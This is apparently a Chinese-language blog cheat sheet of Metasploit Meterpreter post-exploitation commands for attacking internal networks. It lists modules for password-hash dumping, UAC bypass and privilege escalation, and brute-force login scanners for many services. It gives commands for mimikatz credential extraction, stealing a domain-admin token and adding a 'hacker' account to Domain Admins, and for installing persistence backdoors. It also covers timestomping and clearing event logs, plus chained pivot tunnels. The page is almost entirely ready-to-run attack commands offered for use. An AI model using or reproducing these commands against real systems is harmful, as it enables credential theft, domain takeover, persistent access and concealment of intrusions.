Meterpreter-Tips

凡是不能把我毁灭的,都将使我更强

meterpreter在内网中的作用就跟web中的sqlmap和burpsuite的价值是一样的。本文只涉及内网,持续更新

0x01 枚举linux可用信息 | windows

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
run post/linux/gather/hashdump #hash密码
run post/linux/gather/checkvm #是否虚拟机
run post/linux/gather/enum_configs #枚举配置信息
run post/linux/gather/enum_network #枚举网络配置
run post/linux/gather/enum_protections #发现像IDS,防病毒,防火墙等
run post/linux/gather/enum_system #获取有关用户帐户/软件/服务/Linux版本
run post/linux/gather/enum_users_history #枚举历史信息
run post/windows/gather/arp_scanner #检测到sessions -i number的IP地址
run post/windows/escalate/getsystem #getsystem
run post/windows/gather/credentials/gpp #寻找储存在SYSVOL中的Groups.xml
post/windows/gather/enum_unattend #全盘搜索Unattend.xml文件查找账户密码
exploit/windows/local/always_install_elevated #创建一个随机文件名的MSI文件并在提权成功后删除所有已部署的文件
run vnc
run scraper #常见信息收集[好用,没有之一]

0x02 Bypass-modules

1
2
3
4
5
6
7
8
9
10
11
exploit/windows/local/bypassuac_vbs #会生成新的session[getsystem]
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_eventvwr
exploit/windows/local/bypassuac
exploit/windows/local/ask
exploit/windows/local/ms13_053_schlamperei
exploit/windows/local/ms14_058_track_popup_menu
exploit/windows/local/ms16_016_webdav #Windows 7 SP1
exploit/windows/local/ms16_032_secondary_logon_handle_privesc
exploit/windows/local/trusted_service_path
exploit/windows/local/service_permissions

0x03 service-attack-modules

1
2
3
4
5
6
7
8
9
10
11
12
13
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/ftp/ftp_login
use auxiliary/scanner/ssh/ssh_login
use auxiliary/scanner/telnet/telnet_login
use auxiliary/scanner/smb/smb_login
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/mysql/mysql_login
use auxiliary/scanner/oracle/oracle_login
use auxiliary/scanner/postgres/postgres_login
use auxiliary/scanner/vnc/vnc_login
use auxiliary/scanner/pcanywhere/pcanywhere_login
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/ftp/anonymous

0x04 meterpreter常用命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
pwd |edit |upload |download |getuid |getsystem |sysinfo #基本命令
python
python_import <-f file path> [-n mod name] [-r result var name]
python_execute <python code> [-r result var name]
python_reset
powershell
powershell_execute <powershell code> [-s session-id]
powershell_import <path to file> [-s session-id] #执行本地ps1或者dll
powershell_shell #会话终端
kiwi
kiwi_cmd "privilege::debug sekurlsa::logonPasswords"
mimikatz
wdigest
mimikatz_command -f sekurlsa::logonPasswords -a "full"
mimikatz_command -f sekurlsa::kerberos -a "full"
sniffer
sniffer_interfaces
sniffer_start [网卡id]
sniffer_stats [网卡id]
sniffer_dump [绝对路径]
令牌劫持[whoami /groups]
ps #查看目标机器进程,找出域控账户运行的进程ID,假如发现PID为 6666
steal_token 6666 [pid] #偷取Token
use incognito #当ps找不到域控账户进程时
list_tokens –u #列出可用token,假如找到域控管理员token
impersonate_token 2008.com\\dcadministrator #使用域管理员token运行meterpreter
add_user hacker password –h 192.168.1.2 #在域控主机上添加账户,ip指向域控
add_group_user "DomainAdmins" test –h 192.168.1.2 #将账户添加至域管理员组
migrate pid #将Meterpreter会话移植到进程数位pid的进程中 [不稳定,explorer.exe]
execute -H -i -f cmd.exe #创建新进程cmd.exe,-H不可见,-i交互
timestompc:/a.txt -c "11/11/2011 11:11:11" #修改文件的创建时间
arp_scanner -r 192.168.1.0/24
run persistence -X -i 5 -p 2222 -r x.x.x.x #开机启动项vbs后门 X86_Linux不支持此脚本
run metsvc -A #Meterpreter服务后门[windows/metsvc_bind_tcp]
clearev #清理痕迹
run autoroute -s 192.168.1.0/24 #配合run post/windows/gather/

0x05 一级隧道

1
2
3
4
5
6
7
8
(依赖:建立meterpreter正常通信 [re:192.168.1.2])
portfwd add -l 1234 -p 3389 -r x.x.x.x #反弹端口3389到本地1234[rdesktop 127.0.0.1:1234]
ssh -f -N -D 127.0.0.1:2222 root@10.1.1.3 #ssh端口转发
route add 10.1.1.0 255.255.255.255 1 #添加session 1的路由表[route print]
use auxiliary/server/socks4a #建立隧道
vim /etc/proxychains.conf
socks4 127.0.0.1 1080
proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms08-067.nse 10.1.1.2

0x06 二级隧道

1
2
3
4
5
6
7
8
9
route add 10.1.1.2 255.255.255.255 2 #添加一级隧道路由表
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp #正向通道
set RHOST 10.1.1.1
set RPORT 2222
use auxiliary/server/socks4a #建立隧道
vim /etc/proxychains.conf
socks4 127.0.0.1 1081
proxychains nmap -sT -sV -p21,22,23,80 -n -Pn -vv 172.16.6.3

0x07 三级隧道

1
2
3
4
5
route add 172.16.6.3 255.255.255.255 3 #添加二级隧道路由表
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp #正向通道
set RHOST 172.16.6.3
set RPORT 3333

0x08 彩蛋

Youtube视频请翻墙,请关闭广告插件

相关链接
Windows-Exploit-Suggester
exploit-db
securityfocus
hackingarticles
https://www.youtube.com/watch?v=jCoL7oXvT_E
https://www.youtube.com/watch?v=DlJyKgfkoKQ

本文为原创,转载请遵守本站的版本

更新于: 2018年5月16日 14:05